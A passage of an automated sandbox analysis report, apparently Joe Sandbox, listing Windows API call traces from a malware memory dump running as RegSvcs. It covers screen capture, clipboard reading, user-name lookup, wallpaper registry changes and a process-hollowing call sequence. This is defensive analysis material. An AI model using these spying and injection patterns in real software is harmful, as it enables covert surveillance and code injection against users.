                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                      • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                      • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                      • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateInfoParametersSystemValue
                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                    • API String ID: 4127273184-3576401099
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • IsValidCodePage.KERNEL32(00000000), ref: 00451DBA
                                    • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                    • _wcschr.LIBVCRUNTIME ref: 00451E58
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451EFB
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                    • String ID:
                                    • API String ID: 4212172061-0
                                    APIs
                                    • _free.LIBCMT ref: 004493BD
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • GetTimeZoneInformation.KERNEL32 ref: 004493CF
                                    • WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 00449447
                                    • WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 00449474
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                    • String ID:
                                    • API String ID: 806657224-0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                    • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                    • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                    • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                    • String ID:
                                    • API String ID: 2829624132-0
                                    • Opcode ID: efce462eab54bf8eb2a2b6f9a4d43eb8e53eecd25de09d2246b00390d92e3d5e
                                    • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                    • Opcode Fuzzy Hash: efce462eab54bf8eb2a2b6f9a4d43eb8e53eecd25de09d2246b00390d92e3d5e
                                    • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                    • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                    • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                    • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                                    • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$AcquireRandomRelease
                                    • String ID:
                                    • API String ID: 1815803762-0
                                    • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                    • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                    • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                    • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                    APIs
                                    • OpenClipboard.USER32(00000000), ref: 0040B711
                                    • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                    • CloseClipboard.USER32 ref: 0040B725
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseDataOpen
                                    • String ID:
                                    • API String ID: 2058664381-0
                                    • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                    • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                    • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                    • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-3916222277
                                    • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                    • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                    • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                    • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: GetLocaleInfoEx
                                    • API String ID: 2299586839-2904428671
                                    • Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                                    • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                    • Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                                    • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                    • HeapFree.KERNEL32(00000000), ref: 004120EE
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                    • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                    • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                    • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                    • String ID:
                                    • API String ID: 1663032902-0
                                    • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                    • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                    • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                    • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(004520C3,00000001), ref: 0045200D
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: 92dc4731b164c5dad593997b290ced1c322b4c5a654dbafbc59ecf52729822b9
                                    • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                    • Opcode Fuzzy Hash: 92dc4731b164c5dad593997b290ced1c322b4c5a654dbafbc59ecf52729822b9
                                    • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$InfoLocale_abort_free
                                    • String ID:
                                    • API String ID: 2692324296-0
                                    • Opcode ID: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                    • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                    • Opcode Fuzzy Hash: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                    • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(00452313,00000001), ref: 00452082
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: 80e5df12ac25632c7280d140c15a53509e07ecbf1c9f73c72f1a6f69193256f5
                                    • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                    • Opcode Fuzzy Hash: 80e5df12ac25632c7280d140c15a53509e07ecbf1c9f73c72f1a6f69193256f5
                                    • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                    • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                    • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                    • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                    APIs
                                      • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                    • EnumSystemLocalesW.KERNEL32(Function_000483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                    • String ID:
                                    • API String ID: 1272433827-0
                                    • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                    • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                    • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                    • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(00451EA7,00000001), ref: 00451F87
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                    • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                    • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                    • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                    • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                    • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                    • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                    • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                    • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                    • Instruction Fuzzy Hash:

                                    Control-flow Graph

                                    control_flow_graph 664 418e76-418ebd CreateDCA CreateCompatibleDC call 419325 667 418ec3-418ede call 419367 664->667 668 418ebf-418ec1 664->668 669 418ee2-418ee4 667->669 668->667 668->669 672 418f36-418f3d call 402093 669->672 673 418ee6-418ee8 669->673 677 418f42-418f4e 672->677 673->672 674 418eea-418f21 call 41939d CreateCompatibleBitmap 673->674 679 418f23-418f2f DeleteDC * 2 674->679 680 418f4f-418f59 SelectObject 674->680 681 418f30 DeleteObject 679->681 682 418f5b 680->682 683 418f6a-418f91 StretchBlt 680->683 681->672 684 418f5c-418f68 DeleteDC * 2 682->684 683->682 685 418f93-418f98 683->685 684->681 686 419014-41901c 685->686 687 418f9a-418faf 685->687 688 41905e-419070 GetObjectA 686->688 689 41901e-419025 686->689 687->686 694 418fb1-418fc5 GetIconInfo 687->694 688->682 693 419076-419088 688->693 691 419027-41904c BitBlt 689->691 692 41904e-41905b 689->692 691->688 692->688 695 41908a-41908c 693->695 696 41908e-419098 693->696 694->686 697 418fc7-419010 DeleteObject * 2 DrawIcon 694->697 698 4190c5 695->698 699 4190c9-4190d2 696->699 700 41909a-4190a4 696->700 697->686 698->699 701 4190d3-41910d LocalAlloc 699->701 700->699 702 4190a6-4190b0 700->702 703 419119-419150 GlobalAlloc 701->703 704 41910f-419116 701->704 702->699 705 4190b2-4190b8 702->705 708 419152-419156 703->708 709 41915b-419170 GetDIBits 703->709 704->703 706 4190c2-4190c4 705->706 707 4190ba-4190c0 705->707 706->698 707->701 708->684 710 419172-419193 DeleteDC * 2 DeleteObject GlobalFree 709->710 711 419198-419260 call 4020df * 2 call 40250a call 403376 call 40250a call 403376 call 40250a call 403376 DeleteObject GlobalFree DeleteDC 709->711 710->672 728 419262-419263 DeleteDC 711->728 729 419265-419289 call 402055 call 401fd8 * 2 711->729 728->729 729->677
                                    APIs
                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                    • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                      • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                    • DeleteDC.GDI32(00000000), ref: 00418F2A
                                    • DeleteDC.GDI32(00000000), ref: 00418F2D
                                    • DeleteObject.GDI32(00000000), ref: 00418F30
                                    • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                    • DeleteDC.GDI32(00000000), ref: 00418F62
                                    • DeleteDC.GDI32(00000000), ref: 00418F65
                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                    • GetIconInfo.USER32(?,?), ref: 00418FBD
                                    • DeleteObject.GDI32(?), ref: 00418FEC
                                    • DeleteObject.GDI32(?), ref: 00418FF9
                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                    • DeleteDC.GDI32(?), ref: 0041917C
                                    • DeleteDC.GDI32(00000000), ref: 0041917F
                                    • DeleteObject.GDI32(00000000), ref: 00419182
                                    • GlobalFree.KERNEL32(?), ref: 0041918D
                                    • DeleteObject.GDI32(00000000), ref: 00419241
                                    • GlobalFree.KERNEL32(?), ref: 00419248
                                    • DeleteDC.GDI32(?), ref: 00419258
                                    • DeleteDC.GDI32(00000000), ref: 00419263
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                    • String ID: DISPLAY
                                    • API String ID: 479521175-865373369
                                    • Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                                    • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                    • Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                                    • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A

                                    Control-flow Graph (executed/not-executed graph rendering omitted; not recoverable from the extracted text)
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                    • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
